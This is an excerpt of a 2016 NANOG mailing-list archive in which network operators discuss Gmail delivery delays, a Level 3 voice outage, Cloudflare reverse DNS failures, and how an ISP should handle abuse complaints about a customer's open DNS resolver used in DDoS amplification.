> >>>> lostoncampus.com.au. @205.251.199.20 (ns-1812.awsdns-34.co.uk.): > >> dns=3Dok > >>>> edns=3Dok edns1=3Dtimeout edns at 512=3Dok ednsopt=3Dok = > edns1opt=3Dtimeout do=3Dok > >>>> ednsflags=3Dok optlist=3Dok,nsid,subnet signed=3Dok ednstcp=3Dok > >>>>=20 > >>>> -- > >>>> Mark Andrews, ISC > >>>> 1 Seymour St., Dundas Valley, NSW 2117, Australia > >>>> PHONE: +61 2 9871 4742 INTERNET: > >> marka at isc.org > >>>>=20 > >>>=20 > >> -- > >> Mark Andrews, ISC > >> 1 Seymour St., Dundas Valley, NSW 2117, Australia > >> PHONE: +61 2 9871 4742 INTERNET: marka at isc.org > >>=20 > -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From mel at beckman.org Sat Aug 27 10:34:36 2016 From: mel at beckman.org (Mel Beckman) Date: Sat, 27 Aug 2016 10:34:36 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160827012542.43353.qmail@ary.lan> References: , <20160827012542.43353.qmail@ary.lan> Message-ID: <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> John, But mailop doesn't have the same odd mix of people as nanog. For example, I'm not on mailop. :) In any event, Nate specifically asked if other nanogers were seeing similar symptoms, which is an entirely appropriate use of this list. -mel On Aug 26, 2016, at 9:26 PM, John Levine > wrote: In article > you write: I was working within the limits of what I had available. Here's the subscription page for mailop. It's got about as odd a mix of people as nanog, ranging from people with single user linux machines to people who run some of the largest mail systems in the world, including Gmail: https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop R's, John From johnl at iecc.com Sat Aug 27 15:46:35 2016 From: johnl at iecc.com (John Levine) Date: 27 Aug 2016 15:46:35 -0000 Subject: Can someone from Amazon please answer. In-Reply-To: <20160827023636.05DDA5294030@rock.dv.isc.org> Message-ID: <20160827154635.45594.qmail@ary.lan> >> If you ask for AAAA of www.thruway.ny.gov it is a CNAME to = >> www.wip.thruway.ny.gov and that >> breaks a number of DNS servers and load balancers, eg: >Your tax payer dollars at work. Naah. The Thruway is supported by user fees, no taxes involved. I will agree they have a couple of pretty braindead nameservers, though. R's, John From A.L.M.Buxey at lboro.ac.uk Sat Aug 27 17:13:45 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Sat, 27 Aug 2016 17:13:45 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827171345.GA9725@lboro.ac.uk> Hi, > administrator reaching out to peers for assistance with a particular > problem that is clearly network related is inappropriate for a network clearly network related? people have an interesting expectation of email - expecting instant delivery. you might check their level of expectation....the SLA etc define service availability but email delivery is pretty much 'best efforts of all parties involved in the transaction' - ideally it gets there quickly...but it could take up to 72 hours. google have several status dashboards that you can check/monitor. generally, if you have an issue with a particular service on the internet, contact them directly. dont use a 3rd party mail list - they *might* be aroudn on it but its not their official service desk contact point ;-) alan From A.L.M.Buxey at lboro.ac.uk Sat Aug 27 17:16:57 2016 From: A.L.M.Buxey at lboro.ac.uk (A.L.M.Buxey at lboro.ac.uk) Date: Sat, 27 Aug 2016 17:16:57 +0000 Subject: Why the internal network delays, Gmail? In-Reply-To: References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> Message-ID: <20160827171657.GB9725@lboro.ac.uk> Hi, > I was working within the limits of what I had available. Google offer several trouble shooting tools for their service too, you might want to look at their toolbox eg https://toolbox.googleapps.com/apps/messageheader/ (part of their 'why is my email slow to deliver?' process) alan From Valdis.Kletnieks at vt.edu Sat Aug 27 18:24:23 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sat, 27 Aug 2016 14:24:23 -0400 Subject: Why the internal network delays, Gmail? In-Reply-To: <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> References: , <20160827012542.43353.qmail@ary.lan> <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> Message-ID: <77625.1472322263@turing-police.cc.vt.edu> On Sat, 27 Aug 2016 10:34:36 -0000, Mel Beckman said: > But mailop doesn't have the same odd mix of people as nanog. For example, I'm > not on mailop. :) And apparently you need to know the secret handshake to get on. After Chrome complained the SSL cert on the subscription page had expired 6 months ago, the site tells me I can't subscribe: Your subscription is not allowed because the email address you gave is insecure. Yay, team? -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 830 bytes Desc: not available URL: From nate at dopedesign.com Sat Aug 27 19:23:01 2016 From: nate at dopedesign.com (Nate Metheny) Date: Sat, 27 Aug 2016 13:23:01 -0600 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160827171657.GB9725@lboro.ac.uk> References: <20160826201223.42561.qmail@ary.lan> <13354888-4527-4A83-AA15-904E5B45C34E@beckman.org> <36c4f1f5-68de-2fbb-e825-3f1afbb58a6a@blakjak.net> <20160827171657.GB9725@lboro.ac.uk> Message-ID: Thanks for all the feedback related and unrelated to the problem. I'm aware of many available troubleshooting tools and considered this one of them, but I've been shown that this, albeit appropriate, forum, was not a good choice to solicit technical assistance. I consider the matter closed. -- Sent from a phone. Please excuse the brevity of this message and any typographical errors. On Aug 27, 2016 11:17, wrote: > Hi, > > > I was working within the limits of what I had available. > > Google offer several trouble shooting tools for their service too, > you might want to look at their toolbox eg > > https://toolbox.googleapps.com/apps/messageheader/ > > (part of their 'why is my email slow to deliver?' process) > > alan > From mpalmer at hezmatt.org Sun Aug 28 01:46:27 2016 From: mpalmer at hezmatt.org (Matt Palmer) Date: Sun, 28 Aug 2016 11:46:27 +1000 Subject: Why the internal network delays, Gmail? In-Reply-To: <20160827012542.43353.qmail@ary.lan> References: <20160827012542.43353.qmail@ary.lan> Message-ID: <20160828014627.GE4869@hezmatt.org> On Sat, Aug 27, 2016 at 01:25:42AM -0000, John Levine wrote: > In article you write: > >I was working within the limits of what I had available. > > Here's the subscription page for mailop. It's got about as odd > a mix of people as nanog, ranging from people with single user linux > machines to people who run some of the largest mail systems in > the world, including Gmail: > > https://chilli.nosignal.org/cgi-bin/mailman/listinfo/mailop I know they're mailops, and not tlsops, but surely presenting a cert that didn't expire six months ago isn't beyond the site admin's capabilities? - Matt From joe at nethead.com Sun Aug 28 07:53:33 2016 From: joe at nethead.com (Joe Hamelin) Date: Sun, 28 Aug 2016 00:53:33 -0700 Subject: Why the internal network delays, Gmail? In-Reply-To: <77625.1472322263@turing-police.cc.vt.edu> References: <20160827012542.43353.qmail@ary.lan> <1F803517-43C0-4469-A7FF-C53C92D0EC26@beckman.org> <77625.1472322263@turing-police.cc.vt.edu> Message-ID: On Sat, Aug 27, 2016 at 11:24 AM, wrote: > > And apparently you need to know the secret handshake to get on. I was able to sign-up yesterday, I even saw John's mail about your insecure error. I don't know why I didn't sign up before, my work ITIL is Messaging Manager. -- Joe Hamelin, W7COM, Tulalip, WA, +1 (360) 474-7474 From erich at gotfusion.net Sun Aug 28 12:51:09 2016 From: erich at gotfusion.net (Kaiser, Erich) Date: Sun, 28 Aug 2016 07:51:09 -0500 Subject: Brocade 6910 password recovery Message-ID: Anyone know how to do a password recovery on the BR6910 Metro E Switches, I know standard procedure for 99% of their gear, but it does not work on these. I have searched high and low online and also submitted ticket, with no answer yet. Thanks in advance. Erich Kaiser The Fusion Network From dhubbard at dino.hostasaurus.com Mon Aug 29 14:31:19 2016 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 29 Aug 2016 14:31:19 +0000 Subject: Level 3 voice outage? Message-ID: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> Curious if anyone else is having issues with Level 3 (legacy Twtelecom specifically) enterprise SIP? I?m at minute 45 of being on hold with them, so I suspect they are having known issues. Our sales rep mentioned a toll free outage being tracked under master ticket 11377637 but I don?t have the details of that yet. We?re seeing our toll free numbers completely down, since what I believe to be 4a EST time frame. Most of our toll numbers have an unusual 25 second delay before we get any SIP traffic from their equipment, but the call does ultimately connect. David From sryan at arbor.net Mon Aug 29 14:34:27 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Mon, 29 Aug 2016 14:34:27 +0000 Subject: Level 3 voice outage? In-Reply-To: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> References: <542F38AA-F406-4D50-B211-CBE1E32D0D7A@dino.hostasaurus.com> Message-ID: Ran across this earlier, it sounds bad. https://www.reddit.com/r/networking/comments/504xbo/level_3_voice_outage_global_ticket_being_worked/ Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of David Hubbard Sent: Monday, August 29, 2016 10:31:19 AM To: nanog at nanog.org Subject: Level 3 voice outage? Curious if anyone else is having issues with Level 3 (legacy Twtelecom specifically) enterprise SIP? I?m at minute 45 of being on hold with them, so I suspect they are having known issues. Our sales rep mentioned a toll free outage being tracked under master ticket 11377637 but I don?t have the details of that yet. We?re seeing our toll free numbers completely down, since what I believe to be 4a EST time frame. Most of our toll numbers have an unusual 25 second delay before we get any SIP traffic from their equipment, but the call does ultimately connect. David From jason.m.lee at gmail.com Mon Aug 29 15:55:27 2016 From: jason.m.lee at gmail.com (Jason Lee) Date: Mon, 29 Aug 2016 10:55:27 -0500 Subject: Handling of Abuse Complaints Message-ID: NANOG Community, I was curious how various players in this industry handle abuse complaints. I'm drafting a policy for the service provider I'm working for about handing of complaints registered against customer IP space. In this example I have a customer who is running an open resolver and have received a few complaints now regarding it being used as part of a DDoS attack. My initial response was to inform the customer and ask them to fix it. Now that its still ongoing over a month later, I'd like to take action to remediate the issue myself with ACLs but our customer facing team is pushing back and without an idea of what the industry best practice is, management isn't sure which way to go. I'm hoping to get an idea of how others handle these cases so I can develop our formal policy on this and have management sign off and be able to take quicker action in the future. Thanks, Jason From hugo at slabnet.com Mon Aug 29 16:05:13 2016 From: hugo at slabnet.com (Hugo Slabbert) Date: Mon, 29 Aug 2016 09:05:13 -0700 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <20160829160513.GG16458@bamboo.slabnet.com> On Mon 2016-Aug-29 10:55:27 -0500, Jason Lee wrote: >NANOG Community, > >I was curious how various players in this industry handle abuse complaints. >I'm drafting a policy for the service provider I'm working for about >handing of complaints registered against customer IP space. In this example >I have a customer who is running an open resolver and have received a few >complaints now regarding it being used as part of a DDoS attack. > >My initial response was to inform the customer and ask them to fix it. Now >that its still ongoing over a month later, I'd like to take action to >remediate the issue myself with ACLs but our customer facing team is >pushing back and without an idea of what the industry best practice is, >management isn't sure which way to go. > >I'm hoping to get an idea of how others handle these cases so I can develop >our formal policy on this and have management sign off and be able to take >quicker action in the future. If you've informed them of the issue, given them time to resolve, and they've failed to take action, at some point you need to escalate and cauterize the wound to prevent abuse traffic spewing forth from the cusotmer's (and subsequently your) network. How you implement that specifically is your call, but I would at least start giving specific timelines to the customer and outline the steps that will be taken if they fail to remediate by those times in order to give them fair warning. I've been fairly specific previously about crafting filters to drop just the offending traffic, which should be doable here given the vector, but in other cases where it was obvious the offending hosts were simply compromised to hell and spewing myriad garbage traffic, I have cut users off completely to chop C&C access etc. This was during time at a regional commercial ISP on business circuits. -- Hugo Slabbert | email, xmpp/jabber: hugo at slabnet.com pgp key: B178313E | also on Signal > >Thanks, > >Jason -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 836 bytes Desc: Digital signature URL: From bill at herrin.us Mon Aug 29 16:27:42 2016 From: bill at herrin.us (William Herrin) Date: Mon, 29 Aug 2016 12:27:42 -0400 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: Dear Customer, Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. This will likely disrupt your service. To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. I stand ready to assist any way that I can. Regards, Your Name On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this example > I have a customer who is running an open resolver and have received a few > complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. Now > that its still ongoing over a month later, I'd like to take action to > remediate the issue myself with ACLs but our customer facing team is > pushing back and without an idea of what the industry best practice is, > management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can develop > our formal policy on this and have management sign off and be able to take > quicker action in the future. > > Thanks, > > Jason -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From Gareth.Tupper at warnerpacific.com Mon Aug 29 16:31:58 2016 From: Gareth.Tupper at warnerpacific.com (Gareth Tupper) Date: Mon, 29 Aug 2016 16:31:58 +0000 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. /pedant -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin Sent: Monday, August 29, 2016 9:28 AM To: Jason Lee Cc: nanog at nanog.org Subject: Re: Handling of Abuse Complaints Dear Customer, Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. This will likely disrupt your service. To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. I stand ready to assist any way that I can. Regards, Your Name On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this > example I have a customer who is running an open resolver and have > received a few complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. > Now that its still ongoing over a month later, I'd like to take action > to remediate the issue myself with ACLs but our customer facing team > is pushing back and without an idea of what the industry best practice > is, management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can > develop our formal policy on this and have management sign off and be > able to take quicker action in the future. > > Thanks, > > Jason -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: This electronic mail transmission contains information from Warner Pacific Insurance Services that may be confidential or privileged. Such information is solely for the intended recipient, and use by any other party is not authorized. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of this message, its contents or any attachments is prohibited. Any wrongful interception of this message is punishable as a Federal Crime. If you have received this message in error, please notify the sender immediately by telephone (800) 801-2300 or by electronic mail at postmaster at warnerpacific.com. From fergdawgster at mykolab.com Mon Aug 29 16:37:28 2016 From: fergdawgster at mykolab.com (Paul Ferguson) Date: Mon, 29 Aug 2016 09:37:28 -0700 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> I would suggest that violation of the ISP?s ToS should also be consideration, since what may be illegal in one jurisdiction may not be illegal in some other jurisdictions. Repeated abuse and violations of an ISP?s ToS should also be a consideration to terminate a customer relationship, and ISPs are fully within their rights to take this type of action. - ferg > On Aug 29, 2016, at 9:31 AM, Gareth Tupper wrote: > > "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. > > /pedant > > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin > Sent: Monday, August 29, 2016 9:28 AM > To: Jason Lee > Cc: nanog at nanog.org > Subject: Re: Handling of Abuse Complaints > > Dear Customer, > > Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. > > The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. > This will likely disrupt your service. > > To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. > > I stand ready to assist any way that I can. > > Regards, > Your Name > > > > > > On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: >> NANOG Community, >> >> I was curious how various players in this industry handle abuse complaints. >> I'm drafting a policy for the service provider I'm working for about >> handing of complaints registered against customer IP space. In this >> example I have a customer who is running an open resolver and have >> received a few complaints now regarding it being used as part of a DDoS attack. >> >> My initial response was to inform the customer and ask them to fix it. >> Now that its still ongoing over a month later, I'd like to take action >> to remediate the issue myself with ACLs but our customer facing team >> is pushing back and without an idea of what the industry best practice >> is, management isn't sure which way to go. >> >> I'm hoping to get an idea of how others handle these cases so I can >> develop our formal policy on this and have management sign off and be >> able to take quicker action in the future. >> >> Thanks, >> >> Jason > > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: > > > This electronic mail transmission contains information from Warner Pacific Insurance Services that may be confidential or privileged. Such information is solely for the intended recipient, and use by any other party is not authorized. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of this message, its contents or any attachments is prohibited. Any wrongful interception of this message is punishable as a Federal Crime. If you have received this message in error, please notify the sender immediately by telephone (800) 801-2300 or by electronic mail at postmaster at warnerpacific.com. ? Paul Ferguson ICEBRG.io Seattle, Washington, USA -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 236 bytes Desc: Message signed with OpenPGP using GPGMail URL: From steve at blighty.com Mon Aug 29 16:47:04 2016 From: steve at blighty.com (Steve Atkins) Date: Mon, 29 Aug 2016 09:47:04 -0700 Subject: Handling of Abuse Complaints In-Reply-To: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> Message-ID: > On Aug 29, 2016, at 9:37 AM, Paul Ferguson wrote: > > I would suggest that violation of the ISP?s ToS should also be consideration, since what may be illegal in one jurisdiction may not be illegal in some other jurisdictions. Unless your abuse / security desk is staffed by lawyers it's probably better to avoid words like "criminal" and "unlawfully" altogether and stick to "in violation of our ToS". > Repeated abuse and violations of an ISP?s ToS should also be a consideration to terminate a customer relationship, and ISPs are fully within their rights to take this type of action. And don't need to lean on "it's probably illegal" to do so, nor imply that if it were legal they wouldn't necessarily enforce their ToS. (All assuming that being abused as part of a dDoS reflector actually is against your ToS. If it's not things get more complex.) Cheers, Steve > > - ferg > > > >> On Aug 29, 2016, at 9:31 AM, Gareth Tupper wrote: >> >> "unlawfully" is probably redundant, unless these are otherwise law-abiding cyber criminals. >> >> /pedant >> >> -----Original Message----- >> From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of William Herrin >> Sent: Monday, August 29, 2016 9:28 AM >> To: Jason Lee >> Cc: nanog at nanog.org >> Subject: Re: Handling of Abuse Complaints >> >> Dear Customer, >> >> Cyber criminals are using your network (and ours) to unlawfully attack other computers on the Internet. >> >> The specific security problem with your DNS server at 127.0.0.1 was first reported to you on Date1 (original message attached). Please be advised that we will interrupt network access to that server on Date2. >> This will likely disrupt your service. >> >> To avoid disruption, please contact me at Email with a mitigation plan no later than close of business Date3. >> >> I stand ready to assist any way that I can. >> >> Regards, >> Your Name >> >> >> >> >> >> On Mon, Aug 29, 2016 at 11:55 AM, Jason Lee wrote: >>> NANOG Community, >>> >>> I was curious how various players in this industry handle abuse complaints. >>> I'm drafting a policy for the service provider I'm working for about >>> handing of complaints registered against customer IP space. In this >>> example I have a customer who is running an open resolver and have >>> received a few complaints now regarding it being used as part of a DDoS attack. >>> >>> My initial response was to inform the customer and ask them to fix it. >>> Now that its still ongoing over a month later, I'd like to take action >>> to remediate the issue myself with ACLs but our customer facing team >>> is pushing back and without an idea of what the industry best practice >>> is, management isn't sure which way to go. >>> >>> I'm hoping to get an idea of how others handle these cases so I can >>> develop our formal policy on this and have management sign off and be >>> able to take quicker action in the future. >>> >>> Thanks, >>> >>> Jason >> >> >> >> -- >> William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: >> >> >> This electronic mail transmission contains information from Warner Pacific Insurance Services that may be confidential or privileged. Such information is solely for the intended recipient, and use by any other party is not authorized. If you are not the intended recipient, be aware that any disclosure, copying, distribution or use of this message, its contents or any attachments is prohibited. Any wrongful interception of this message is punishable as a Federal Crime. If you have received this message in error, please notify the sender immediately by telephone (800) 801-2300 or by electronic mail at postmaster at warnerpacific.com. > > ? > Paul Ferguson > ICEBRG.io > Seattle, Washington, USA > > > From laszlo at heliacal.net Mon Aug 29 17:04:26 2016 From: laszlo at heliacal.net (Laszlo Hanyecz) Date: Mon, 29 Aug 2016 17:04:26 +0000 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: I know this is against the popular religion here but how is this abuse on the part of your customer? Google, Level3 and many others also run open resolvers, because they're useful services. This is why we can't have nice things. On 2016-08-29 15:55, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this example > I have a customer who is running an open resolver and have received a few > complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. Now > that its still ongoing over a month later, I'd like to take action to > remediate the issue myself with ACLs but our customer facing team is > pushing back and without an idea of what the industry best practice is, > management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can develop > our formal policy on this and have management sign off and be able to take > quicker action in the future. > > Thanks, > > Jason From leefuller23 at gmail.com Mon Aug 29 17:13:33 2016 From: leefuller23 at gmail.com (Lee Fuller) Date: Mon, 29 Aug 2016 18:13:33 +0100 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: It's quite possible to operate an open resolver while still making it very difficult to use in an amplification attack - maybe coach your user into using rate limiting if you are particularly keen not to 'shape' their traffic at this stage. PowerDNS has a very powerful load balancer that can be used effectively although it's name escapes me now. PowerDNS 3x and 4x also has an effective anti spoofing mechanism. *Kind Regards,Lee Fuller* *PGP Fingerprint : * 4ACAEBA4B9EE1B3A075034302D5C3D050E6ED55A On 29 August 2016 at 18:04, Laszlo Hanyecz wrote: > I know this is against the popular religion here but how is this abuse on > the part of your customer? Google, Level3 and many others also run open > resolvers, because they're useful services. This is why we can't have nice > things. > > > > On 2016-08-29 15:55, Jason Lee wrote: > >> NANOG Community, >> >> I was curious how various players in this industry handle abuse >> complaints. >> I'm drafting a policy for the service provider I'm working for about >> handing of complaints registered against customer IP space. In this >> example >> I have a customer who is running an open resolver and have received a few >> complaints now regarding it being used as part of a DDoS attack. >> >> My initial response was to inform the customer and ask them to fix it. Now >> that its still ongoing over a month later, I'd like to take action to >> remediate the issue myself with ACLs but our customer facing team is >> pushing back and without an idea of what the industry best practice is, >> management isn't sure which way to go. >> >> I'm hoping to get an idea of how others handle these cases so I can >> develop >> our formal policy on this and have management sign off and be able to take >> quicker action in the future. >> >> Thanks, >> >> Jason >> > > From fhr at fhrnet.eu Mon Aug 29 17:15:42 2016 From: fhr at fhrnet.eu (Filip Hruska) Date: Mon, 29 Aug 2016 19:15:42 +0200 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu> Google, Level 3 and the like's open DNS resolvers are strictly rate-limited. They can't be used as DDOS amplifiers. On the other hand, there are tons of open resolvers on the internet without any sort of limiting. These are very effective amplifiers. Regards, Filip On 29.8.2016 19:04, Laszlo Hanyecz wrote: > I know this is against the popular religion here but how is this abuse > on the part of your customer? Google, Level3 and many others also run > open resolvers, because they're useful services. This is why we can't > have nice things. > > > On 2016-08-29 15:55, Jason Lee wrote: >> NANOG Community, >> >> I was curious how various players in this industry handle abuse >> complaints. >> I'm drafting a policy for the service provider I'm working for about >> handing of complaints registered against customer IP space. In this >> example >> I have a customer who is running an open resolver and have received a few >> complaints now regarding it being used as part of a DDoS attack. >> >> My initial response was to inform the customer and ask them to fix it. >> Now >> that its still ongoing over a month later, I'd like to take action to >> remediate the issue myself with ACLs but our customer facing team is >> pushing back and without an idea of what the industry best practice is, >> management isn't sure which way to go. >> >> I'm hoping to get an idea of how others handle these cases so I can >> develop >> our formal policy on this and have management sign off and be able to >> take >> quicker action in the future. >> >> Thanks, >> >> Jason > From jmaimon at ttec.com Mon Aug 29 17:46:25 2016 From: jmaimon at ttec.com (Joe Maimon) Date: Mon, 29 Aug 2016 13:46:25 -0400 Subject: Handling of Abuse Complaints In-Reply-To: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu> References: <72606cc6-c720-eb14-c889-f8692ea2b940@fhrnet.eu> Message-ID: <57C474F1.9030202@ttec.com> There is a distance to travel between cant and cant effectively. Perhaps they can share how they ever so effectively have solved this conundrum. After all, they are apparently not getting any abuse reports ever. As an operator of several open resolvers (with rate limiting and automatic mitigation in effect) to support my customer base until the network landscape supports alternative approaches, I would like to know how they accomplished that little trick. Filip Hruska wrote: > Google, Level 3 and the like's open DNS resolvers are strictly > rate-limited. They can't be used as DDOS amplifiers. > > On the other hand, there are tons of open resolvers on the internet > without any sort of limiting. These are very effective amplifiers. > > Regards, > Filip > > On 29.8.2016 19:04, Laszlo Hanyecz wrote: >> I know this is against the popular religion here but how is this abuse >> on the part of your customer? Google, Level3 and many others also run >> open resolvers, because they're useful services. This is why we can't >> have nice things. >> >> >> On 2016-08-29 15:55, Jason Lee wrote: >>> NANOG Community, >>> >>> I was curious how various players in this industry handle abuse >>> complaints. >>> I'm drafting a policy for the service provider I'm working for about >>> handing of complaints registered against customer IP space. In this >>> example >>> I have a customer who is running an open resolver and have received a >>> few >>> complaints now regarding it being used as part of a DDoS attack. >>> >>> My initial response was to inform the customer and ask them to fix it. >>> Now >>> that its still ongoing over a month later, I'd like to take action to >>> remediate the issue myself with ACLs but our customer facing team is >>> pushing back and without an idea of what the industry best practice is, >>> management isn't sure which way to go. >>> >>> I'm hoping to get an idea of how others handle these cases so I can >>> develop >>> our formal policy on this and have management sign off and be able to >>> take >>> quicker action in the future. >>> >>> Thanks, >>> >>> Jason >> > > From bill at herrin.us Mon Aug 29 18:17:53 2016 From: bill at herrin.us (William Herrin) Date: Mon, 29 Aug 2016 14:17:53 -0400 Subject: Handling of Abuse Complaints In-Reply-To: References: <44A68DD2-40FC-470E-9FB2-29D10585886D@mykolab.com> Message-ID: On Mon, Aug 29, 2016 at 12:47 PM, Steve Atkins wrote: > Unless your abuse / security desk is staffed by > lawyers it's probably better to avoid words like > "criminal" and "unlawfully" altogether Not really an ambiguous situation IMHO, but whatever floats your boat. Bear in mind, though, that if you reasonably suspect your company is caught up in a specific violation of the law and you fail to validate and/or end the violation, your inaction brings liability on the company. Even though you're not a lawyer. That's true from the highest executive to the lowest janitor. > and stick to "in violation of our ToS". This I would avoid. A ToS is a contract. Contracts are open to negotiation. The law is not. If you don't want to say "unlawfully attack," then stop at "attack." On Mon, Aug 29, 2016 at 1:04 PM, Laszlo Hanyecz wrote: > I know this is against the popular religion here but how is this abuse on > the part of your customer? Google, Level3 and many others also run open > resolvers, because they're useful services. This is why we can't have nice > things. Google mitigates the attack vector with rate limiting through custom software. I would venture a guess that Jason's customer is not that sophisticated. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From dimith50 at outlook.com Mon Aug 29 14:35:45 2016 From: dimith50 at outlook.com (Hristo Dimitrov) Date: Mon, 29 Aug 2016 16:35:45 +0200 Subject: Looking for Spamhaus contact Message-ID: Hi, Could somebody from Spamhaus contact me offlist? I've run in the case "[CIDR] conflicts with other PBL master records" where the whole range previously seems to have belonged to another ISP who has returned the range to RIPE. However they still have it listed in a PBL and it is not possible to contact them. As per Spamhaus FAQ "...contact Spamhaus directly to obtain control of those Master Ranges. There is a contact address in your PBL Account." The issue is that I do not see a Spamhaus contact address in our PBL account. And there doesn't seem to be any other conventional way to contact Spamhaus... Best regards, Hristo D. From list at satchell.net Mon Aug 29 19:00:49 2016 From: list at satchell.net (Stephen Satchell) Date: Mon, 29 Aug 2016 12:00:49 -0700 Subject: Handling of Abuse Complaints In-Reply-To: References: Message-ID: <3dc3fd61-5123-0070-dd4e-435ce6785577@satchell.net> On 08/29/2016 08:55 AM, Jason Lee wrote: > NANOG Community, > > I was curious how various players in this industry handle abuse complaints. > I'm drafting a policy for the service provider I'm working for about > handing of complaints registered against customer IP space. In this example > I have a customer who is running an open resolver and have received a few > complaints now regarding it being used as part of a DDoS attack. > > My initial response was to inform the customer and ask them to fix it. Now > that its still ongoing over a month later, I'd like to take action to > remediate the issue myself with ACLs but our customer facing team is > pushing back and without an idea of what the industry best practice is, > management isn't sure which way to go. > > I'm hoping to get an idea of how others handle these cases so I can develop > our formal policy on this and have management sign off and be able to take > quicker action in the future. It depends on the nature of the complaint. If it's an amplification attack of some kind, figure out how the perp is doing it, and block it as appropriate. For example, do you filter incoming packets with source address of subnet network and broadcast (shorter than /30) and allnet (255.255.255.255) broadcast, and filter packets outbound with destinations of allnet broadcast? DNS and NTP can be tricked into generating packet storms. In particular, you may want to block excessive large DNS requests inbound using deep packet inspection at your edge. Not all abuse problems are the fault of the customer. You have to do your part as well. From jbaino at gmail.com Mon Aug 29 20:46:05 2016 From: jbaino at gmail.com (Jeremy) Date: Mon, 29 Aug 2016 13:46:05 -0700 Subject: Cloudflare reverse DNS SERVFAIL, normal? Message-ID: We're seeing a huge uptick in reverse dns lookup failures across an app, 99% are all for Cloudflare ip addresses. Instead of seeing a PTR or NXDOMAIN we're getting back SERVFAIL. Does anyone know if this is a standard response from them? Do they not have reverse DNS setup for their 